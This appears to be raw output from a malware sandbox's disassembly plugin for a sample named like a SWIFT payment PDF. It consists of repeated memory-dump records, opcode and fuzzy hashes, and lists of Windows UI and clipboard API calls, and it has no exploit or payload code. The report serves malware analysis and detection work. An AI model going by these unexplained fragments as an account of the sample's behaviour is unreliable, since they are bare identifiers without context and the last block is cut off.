                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d78e28c98a374cb204aa94b28429a7b6d774a14bf2a3b3d49e31a56be60d185f
                                                                                                                                • Instruction ID: f3d16fd4a5ab1c7b7ff06f583b8575e3eb45d70a45d531108c65a45e22132047
                                                                                                                                • Opcode Fuzzy Hash: d78e28c98a374cb204aa94b28429a7b6d774a14bf2a3b3d49e31a56be60d185f
                                                                                                                                • Instruction Fuzzy Hash: 0EC1BF74E01218CFDB15DFA5C994B9DBBB2AF89300F6085A9D408BB364DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fa46d6cb706224814aa580c12ac02c5d780c10a6776f06cbe828086dea6dbd00
                                                                                                                                • Instruction ID: bd2f41f66529f6bcc3674a79be3687f3356c090b909634d70b869ac4c55b7182
                                                                                                                                • Opcode Fuzzy Hash: fa46d6cb706224814aa580c12ac02c5d780c10a6776f06cbe828086dea6dbd00
                                                                                                                                • Instruction Fuzzy Hash: D2C1BE78E00218CFDB15DFA5C994B9DBBB2AF89300F6085A9D408BB364DB359E85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a26a6b8feb41f0f86fe4b27010ab6d6bb414d131effbdfb4eb11c52aa64a6793
                                                                                                                                • Instruction ID: e073facdb3ed0491f627a9c11c50a2cd51d1dfc417bd6e04ad45ffb2b583026e
                                                                                                                                • Opcode Fuzzy Hash: a26a6b8feb41f0f86fe4b27010ab6d6bb414d131effbdfb4eb11c52aa64a6793
                                                                                                                                • Instruction Fuzzy Hash: 88C1BF74E01218CFDB15DFA5C994B9DBBB2AF89300F6081A9D409BB364DB359E85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f63a06d74015cad49778ac3067a57b56891c72c76387bb25bf57ce3ea7f7869d
                                                                                                                                • Instruction ID: 06aab8996d28691a257361ac55658159b081ffe05d86a48114cb9d76acad35e7
                                                                                                                                • Opcode Fuzzy Hash: f63a06d74015cad49778ac3067a57b56891c72c76387bb25bf57ce3ea7f7869d
                                                                                                                                • Instruction Fuzzy Hash: F9C1AE79E01218CFDB15DFA5C994B9DBBB2AF89300F6085A9D408AB364DB359E85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ab2c4ec98dd45e1a48e7f20d3c1dcb1cf7c831d39995008b39c7e90cd3d78242
                                                                                                                                • Instruction ID: d79f3beaf2fd66836dc9155bab0d525195aa4771462641651cdbb3e2449d89ef
                                                                                                                                • Opcode Fuzzy Hash: ab2c4ec98dd45e1a48e7f20d3c1dcb1cf7c831d39995008b39c7e90cd3d78242
                                                                                                                                • Instruction Fuzzy Hash: 3EC1BF79E00218CFDB15DFA5C994B9DBBB2AF89300F6085A9D409BB364DB359E85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 956dcd19ca264eb9f2e8b9d02aad73c0ec60724023c3a28e7ce3aa68a0ef98a2
                                                                                                                                • Instruction ID: d7ba93f14a443b77170dcab94c919a51ef7802aee814e2dc9a9f79666dc7c546
                                                                                                                                • Opcode Fuzzy Hash: 956dcd19ca264eb9f2e8b9d02aad73c0ec60724023c3a28e7ce3aa68a0ef98a2
                                                                                                                                • Instruction Fuzzy Hash: 13C1BF74E01218CFDB15DFA9C994B9DBBB2AF89300F6085A9D408BB364DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 67936b50b6102c4fcfcb2bcc524f6dfb51939eb96b18bb2d9124adf6af4bb803
                                                                                                                                • Instruction ID: f8833f06723f83d9b4b1f136f5dd347bbb5583453020507330311e037c423a78
                                                                                                                                • Opcode Fuzzy Hash: 67936b50b6102c4fcfcb2bcc524f6dfb51939eb96b18bb2d9124adf6af4bb803
                                                                                                                                • Instruction Fuzzy Hash: B1C1BE78E01218CFDB15DFA5C984B9DBBB2AF89300F6085A9D409BB364DB359E85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 190d0ab374727cfcb0ed13f0ce088f4bea83f1fd6a295a998afaae9eefa1f52e
                                                                                                                                • Instruction ID: 4d6290965972e0fe5a5140a20b24cdd60a8250f79306a6c3f191697ce9e943b5
                                                                                                                                • Opcode Fuzzy Hash: 190d0ab374727cfcb0ed13f0ce088f4bea83f1fd6a295a998afaae9eefa1f52e
                                                                                                                                • Instruction Fuzzy Hash: D9C1B079E00218CFDB15DFA5C984B9DBBB2AF89300F6085A9D409BB364DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4e6e2fcd4939cc333e63b7afbba815e1e17ac08f9f555319fcd161fc308087d2
                                                                                                                                • Instruction ID: 64b003eed716941b5dedc5cb6e9bf80a7a82e62fc8b036b79197ea67805d13d4
                                                                                                                                • Opcode Fuzzy Hash: 4e6e2fcd4939cc333e63b7afbba815e1e17ac08f9f555319fcd161fc308087d2
                                                                                                                                • Instruction Fuzzy Hash: E8C1BF75E01218CFDB15DFA5C994B9DBBB2AF89300F6085A9D408BB364DB359E85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 112d9fd3c55bee62fa903e91eadbb791f9309b177592540dcef5129c2c9966ca
                                                                                                                                • Instruction ID: 20259d9db976b26ab1d170aab6eeb3fb8ab25df039d2e31f919fb35a1665d840
                                                                                                                                • Opcode Fuzzy Hash: 112d9fd3c55bee62fa903e91eadbb791f9309b177592540dcef5129c2c9966ca
                                                                                                                                • Instruction Fuzzy Hash: 79C1BE79E01218CFDB15DFA5C984B9DBBB2AF89300F6081A9D409BB364DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 797cecfe87bf59fb8c1960491a254c13297607410279928885f507fa1d6dd381
                                                                                                                                • Instruction ID: 5e3eee6886f28e114293afa3d75e9c219afd5bdf427d3bc0aba2d0a0cf51ef9a
                                                                                                                                • Opcode Fuzzy Hash: 797cecfe87bf59fb8c1960491a254c13297607410279928885f507fa1d6dd381
                                                                                                                                • Instruction Fuzzy Hash: 5CC1BE78E01218CFDB15DFA5C984B9DBBB2AF89300F6081A9D409BB364DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8b98ef8417c8735e66ec87354c0069a5f537c6d22579eb62c1549dfbf05dcaa8
                                                                                                                                • Instruction ID: 7ac0fbfe36c3f40f55455aab18eece08593fb9237bdd42a1b96cd1fb0e5376f5
                                                                                                                                • Opcode Fuzzy Hash: 8b98ef8417c8735e66ec87354c0069a5f537c6d22579eb62c1549dfbf05dcaa8
                                                                                                                                • Instruction Fuzzy Hash: 5DC1BF74E01218CFDB15DFA5C994B9DBBB2AF89300F6085A9D408BB364DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 256cec6a844d41b57b9fab4566f65386ce504dac924a9d4ae2afd34096ce313a
                                                                                                                                • Instruction ID: 9918c69b547411b0e93811560ac1317bcbad082437984d08aef0349688a3e715
                                                                                                                                • Opcode Fuzzy Hash: 256cec6a844d41b57b9fab4566f65386ce504dac924a9d4ae2afd34096ce313a
                                                                                                                                • Instruction Fuzzy Hash: 30C1BE79E01218CFDB15DFA5C984B9DBBB2AF89300F6085A9D409BB364DB359E85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1d0384bdcd6361489b1d90ab98d72fb22eb334883ea7c6b44ca5e82728d7e6b6
                                                                                                                                • Instruction ID: f747c33ed86df85d7892142e9544a96618fcc6b0374e07ddc5d56cd3b1263521
                                                                                                                                • Opcode Fuzzy Hash: 1d0384bdcd6361489b1d90ab98d72fb22eb334883ea7c6b44ca5e82728d7e6b6
                                                                                                                                • Instruction Fuzzy Hash: A2C1B074E00218CFDB15DFA5C984B9DBBB2AF89300F6081A9D409BB364DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 53cf8881218c82889d7c00ad18a7606e5ef4a886c47c1836536809a324a819e4
                                                                                                                                • Instruction ID: ab1a01cb9ae3ff5540dbc4de31d4da8410eaf78e8c7a6aa96d6912a0f6d15ef1
                                                                                                                                • Opcode Fuzzy Hash: 53cf8881218c82889d7c00ad18a7606e5ef4a886c47c1836536809a324a819e4
                                                                                                                                • Instruction Fuzzy Hash: 07C1BF75E01218CFDB15DFA5C984B9DBBB2BF89300F6085A9D408BB364DB399A85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ff0dbc653e4d90a83844b3089491869434d5a7c7fe3fb7c5c9015a3c98d3a365
                                                                                                                                • Instruction ID: aeb9cadbc65482566aed01f1bb5dea0596fb25817f62cd603d867581e30389af
                                                                                                                                • Opcode Fuzzy Hash: ff0dbc653e4d90a83844b3089491869434d5a7c7fe3fb7c5c9015a3c98d3a365
                                                                                                                                • Instruction Fuzzy Hash: 63C1AE78E00218CFDB15DFA5C994B9DBBB2BF89300F6085A9D409BB364DB359A85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c78f130116c4b0704fb44119f203c2b8f0e1eefa954de78d9014ff5a2d8ef899
                                                                                                                                • Instruction ID: 6f7fa18c6bc9b1fef298710394b77ad8e00d9aeea1a6abb3bd3337f5e6272f96
                                                                                                                                • Opcode Fuzzy Hash: c78f130116c4b0704fb44119f203c2b8f0e1eefa954de78d9014ff5a2d8ef899
                                                                                                                                • Instruction Fuzzy Hash: 00C1AE79E01218CFDB15DFA5C984B9DBBB2AF89300F6081A9D409BB364DB359A85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d91f2a902fe8010c46681da498e5b383f9c44d3b1e7dd5f7d4e05b2603935069
                                                                                                                                • Instruction ID: b354cdbca93f032e3e094eebd5f7b4bea9b063b089549374019d7b41b8fa88dd
                                                                                                                                • Opcode Fuzzy Hash: d91f2a902fe8010c46681da498e5b383f9c44d3b1e7dd5f7d4e05b2603935069
                                                                                                                                • Instruction Fuzzy Hash: D0C1BF74E00218CFDB15DFA5C984B9DBBB2AF89300F6081A9D408BB364DB359E85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6c8fe9b06e71a8bffb2a22f9c5a6b3b18814fa28379963f22ff74a218e1decc0
                                                                                                                                • Instruction ID: e6a886be71c11f94b188a21a3ffc7ba1c723de19e5335355ed4af4b55589947f
                                                                                                                                • Opcode Fuzzy Hash: 6c8fe9b06e71a8bffb2a22f9c5a6b3b18814fa28379963f22ff74a218e1decc0
                                                                                                                                • Instruction Fuzzy Hash: B5C1AF74E01218CFDB14DFA5C995B9DBBB2AF89300F6081A9D409BB364DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d2573149c5585ba0c57b6a62c568f283b8bb8e0c12e6ab4d9064f37323fe13fd
                                                                                                                                • Instruction ID: 1dc9fb1f29b4f7c181ff955dd530bbfacc62af3e045c4df6e10b0b594f13e0e2
                                                                                                                                • Opcode Fuzzy Hash: d2573149c5585ba0c57b6a62c568f283b8bb8e0c12e6ab4d9064f37323fe13fd
                                                                                                                                • Instruction Fuzzy Hash: 54C19074E01218CFDB54DFA5C994B9DBBB2AF89300F6081A9D409BB365DB359E86CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8d6cdc85fba2545ad9ce9b00805244a04114a52c8a07f987462d5ebd17d4a432
                                                                                                                                • Instruction ID: 8476a151bb86be8868560c088b94c8d9bc0bb71267a7a8d0c2c81566a51640b3
                                                                                                                                • Opcode Fuzzy Hash: 8d6cdc85fba2545ad9ce9b00805244a04114a52c8a07f987462d5ebd17d4a432
                                                                                                                                • Instruction Fuzzy Hash: F6C1AE75E01218CFDB54DFA5C994B9DBBB2AF89300F6081A9D409BB364DB359E86CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 142d215bd7637aac9c5d9085c8df4b18778872c61c6d99d043141ee36a9fb762
                                                                                                                                • Instruction ID: ccec5006444ae4c375f749e173bdc67a17b4d6b38f2df5e543e3f05a87c908d9
                                                                                                                                • Opcode Fuzzy Hash: 142d215bd7637aac9c5d9085c8df4b18778872c61c6d99d043141ee36a9fb762
                                                                                                                                • Instruction Fuzzy Hash: C4C1A078E00218CFDB54DFA4C994B9DBBB2AF89304F6081A9D409BB765DB359E85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4919fe82b64ba5779d2c56cdf3c83654e4ea4aca08fb57d0853f0fedf7c81805
                                                                                                                                • Instruction ID: 383307c91be1d7de3f34a8a78ed4845bb82ffbd836903943705de902daa23f58
                                                                                                                                • Opcode Fuzzy Hash: 4919fe82b64ba5779d2c56cdf3c83654e4ea4aca08fb57d0853f0fedf7c81805
                                                                                                                                • Instruction Fuzzy Hash: D3C1A078E01218CFDB54DFA4C994B9DBBB2AF89300F6081A9D409BB765DB359E85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 99e26f1388c44bf01ffb26372023652ca731648e44646a4cb9926b97f23a273a
                                                                                                                                • Instruction ID: 3c2e2b9d8be25f72b30601699194360121ae0b30a15b4fcc9f8cd8a5c20d44c5
                                                                                                                                • Opcode Fuzzy Hash: 99e26f1388c44bf01ffb26372023652ca731648e44646a4cb9926b97f23a273a
                                                                                                                                • Instruction Fuzzy Hash: 14D09E79D5421C8ACF11DF54DC442EDF770FBA9310F0124A9804CA7510D7709E94CA55
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                                • ShowWindow.USER32(?,?), ref: 00405440
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                                  • Part of subcall function 0040414E: SendMessageW.USER32(?,?,00000001,00403F7A), ref: 0040415C
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                                • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                                • ShowWindow.USER32(?,?), ref: 004054F1
                                                                                                                                • ShowWindow.USER32(?), ref: 0040553B
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                                • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                                • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                                • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                                • CloseClipboard.USER32 ref: 00405676
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                • String ID: {
                                                                                                                                • API String ID: 590372296-366298937
                                                                                                                                • Opcode ID: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                                • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                                • Opcode Fuzzy Hash: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                                • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                                APIs
                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                                • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                                • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403F02
                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403F52
                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                                • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
